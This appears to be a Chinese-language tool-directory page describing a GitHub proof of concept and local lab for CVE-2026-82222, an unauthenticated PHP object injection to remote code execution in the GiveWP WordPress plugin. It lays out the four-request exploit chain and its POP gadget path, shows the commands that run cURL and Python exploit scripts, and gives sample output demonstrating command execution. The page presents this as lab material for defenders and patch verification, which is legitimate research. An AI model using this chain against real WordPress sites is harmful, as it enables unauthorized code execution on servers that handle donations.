Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-82222-PoC — CVE-2026-82222 的概念验证与本地 DDEV 实验环境,该漏洞是 GiveWP WordPress 插件中一个未经身份验证的 PHP 对象注入导致远程代码执行漏洞,附带 cURL 和 Python 漏洞利用脚本。 | Kitploit
工具/GitHubGitHub/sajjadsiam/cve-2026-82222-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育远程访问工具Payload 开发实验室与实践
GitHubsajjadsiam/cve-2026-82222-poc

CVE-2026-82222-PoC

CVE-2026-82222 的概念验证与本地 DDEV 实验环境,该漏洞是 GiveWP WordPress 插件中一个未经身份验证的 PHP 对象注入导致远程代码执行漏洞,附带 cURL 和 Python 漏洞利用脚本。

2天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

CVE-2026-82222 — GiveWP 未认证 PHP 对象注入 → RCE

针对 CVE-2026-82222 的实验环境 + 概念验证:GiveWP WordPress 捐赠插件 <= 4.16.7.1 中未认证的 PHP 对象注入导致远程代码执行(已在 4.16.7.2 中修复)。

CVECVE-2026-82222
CVSS10.0(严重)
CWECWE-502 — 不可信数据的反序列化
受影响GiveWP(捐赠插件)<= 4.16.7.1
已修复4.16.7.2
公告Patchstack

仅限授权测试。 本仓库用于教育、漏洞研究以及测试你拥有或明确获准测试的系统。 未经授权的使用是非法的。

目的

本仓库旨在帮助安全专业人员理解、检测和防御 CVE-2026-82222。所有演示均针对你在自己机器上运行的本地实验环境(lab/)而设计。PoC 不会向磁盘写入任何内容,也不会更改任何插件设置——命令输出仅通过触发请求的 HTTP 响应返回。完整范围与报告政策请参见 SECURITY.md。

仓库结构

root@kitploit:~
├── lab/                    # DDEV + WordPress + GiveWP 4.16.5.1 漏洞实验环境
│   ├── setup.sh            # 一键构建实验环境
│   ├── set-givewp-version.sh   # 切换漏洞/已修复的 GiveWP 版本
│   ├── .ddev/config.yaml   # DDEV 项目配置
│   └── README.md
├── poc/
│   ├── cve-2026-82222.sh   # cURL 利用脚本
│   ├── poc.py              # Python 利用脚本
│   └── requirements.txt
├── docs/
│   ├── ANALYSIS.md         # 技术分析 + 可达性矩阵
│   ├── BURP-MANUAL.md      # Burp Repeater 操作演示(请求/响应)
│   └── CURL-POC.md         # 可直接复制粘贴的 cURL 操作演示
├── SECURITY.md             # 范围、报告与安全使用政策
└── LICENSE

漏洞详情

四个未认证请求加一次触发:

  1. 注册 — GiveWP 的自注册处理器忽略 users_can_register,并发放已认证的 WP cookie。
  2. 植入 — 将序列化的 POP 链(TCPDF → Symfony Session → DonorFactory → system)存储到账户的 last_name 元字段中。
  3. 投毒 — 提交一笔不带 give_last 的捐赠;GiveWP 从数据库填充姓名,以 allowed_classes=false 反序列化该 gadget,并将活动对象图序列化到 wp_give_sessions 中。
  4. 触发 — 一个请求通过不受限制的 unserialize() 读回会话;TCPDF::__destruct() 到达 call_user_func_array('system', [cmd])。输出出现在 HTTP 响应中——不会向磁盘写入任何内容。

完整细节:docs/ANALYSIS.md

快速开始

1. 构建实验环境

root@kitploit:~
cd lab
bash setup.sh
# -> https://cve-2026-82222.ddev.site
#    表单 id 在最后打印,网关:manual,WP 管理员:admin/<random>

需要 Docker + DDEV。

2. 运行 PoC

root@kitploit:~
cd poc
pip install -r requirements.txt

# cURL
bash cve-2026-82222.sh https://cve-2026-82222.ddev.site id <FORM_ID>

# Python
python3 poc.py https://cve-2026-82222.ddev.site <FORM_ID> -c id -g manual -a 10.00 -v

# 仅指纹识别(不利用)
python3 poc.py https://cve-2026-82222.ddev.site --check

两个 PoC 均按设计仅针对单一目标——没有批量或大规模扫描模式。仅对 lab/ 中的实验环境或你获准测试的系统运行它们。

预期成功输出(命令 id):

root@kitploit:~
[*] CVE-2026-82222 kill chain on https://cve-2026-82222.ddev.site (form 5)
[*] 1/5 Registering cve_1b290e (GiveWP ignores users_can_register) ...
      -> HTTP 302
[+] auth cookie obtained
[*] 2/5 Fetching profile nonce ...
[+] nonce=a0fd84c9d7 user_id=7
[*] 3/5 Building POP gadget for command: id
[*] 4/5 Storing gadget in wp_usermeta.last_name ...
      -> HTTP 302
[+] gadget planted
[*] 5/5 Poisoning wp_give_sessions (HTTP 500 is expected) ...
      -> HTTP 500
[+] session poisoned
[*] Triggering RCE ...
[+] COMMAND OUTPUT (id) from /?give_action=view_receipt :

uid=501(sajjadsiam) gid=20(dialout) groups=20(dialout)

3. 验证补丁

root@kitploit:~
cd lab
bash set-givewp-version.sh 4.16.7.2    # 已修复版本
cd ../poc
python3 poc.py https://cve-2026-82222.ddev.site <FORM_ID> -c id -v
# -> 利用链失效;无输出

可达性

GiveWP状态
<= 4.16.5.1存在漏洞——默认安装完全可达
4.16.6 – 4.16.7.1存在漏洞——需要旧版(非 V3)表单;注册需要 give_register_nonce
4.16.7.2已修复

免责声明

本仓库仅供教育和防御性安全研究目的提供。所含代码演示了一个已记录的漏洞,以便防御者构建检测、验证补丁并测试自己的系统。

作者不对本材料造成的任何滥用或损害负责。未经明确授权,请勿将其用于任何系统——这样做可能违反《计算机欺诈与滥用法》(CFAA)及全球范围内的同等法律。参见 SECURITY.md。

致谢

  • 漏洞研究与公告: Patchstack
  • PoC 利用链已在本地 DDEV 安装的 GiveWP 4.16.5.1 上验证并搭建实验环境。

许可证

MIT — 参见 LICENSE。

下载工具